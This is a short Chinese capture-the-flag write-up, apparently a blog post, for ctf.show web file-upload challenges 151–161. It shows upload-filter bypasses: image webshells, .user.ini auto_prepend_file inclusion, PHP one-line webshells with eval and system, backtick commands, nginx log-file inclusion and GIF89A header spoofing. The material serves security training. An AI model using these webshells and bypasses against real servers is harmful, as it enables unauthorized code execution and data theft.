ctf_show-web入门-文件上传(151-161)

• WEB151

 

 

 抓包改个名字即可

 

• WEB152

同上,随便传个图片马

 

• WEB153

考点是.user.ini

注意上传图片目录下有个index.php 即/upload/index.php

首先上传一个1.png图片马

上传auto_prepend_file = 1.png 的.user.ini

这样.user.ini所在目录会全部的文件包含1.png

 

• WEB154

同上过滤了php

一句话木马可以写成：<?=    ?>等价于echo

 

• WEB155

同上

 

• WEB156

同上

过滤了[] 可以用{}

<?=eval($_POST{attack});?>

 

• WEB157

继续过滤了{}和；

那就直接不用一句话木马，直接system('cat flag.ph*')

 

• WEB 158/159

同上，用<?= `cat ../f*`?>

 

• WEB160

过滤了括号和反引号，所以不好上传指令

所以用.user.ini 包含图片

图片包含日志

<?=include"/var/lo"."g/nginx/access.lo"."g"?>

这里不能.user.ini直接包含日志，原因上面说了

另外这里过滤了log所以要拼接一下

 

• WEB161

对文件头检测，

GIF89A用来绕过检测

 

标签：151,web,show,过滤,user,php,上传,png,ini
来源： https://www.cnblogs.com/aninock/p/15185613.html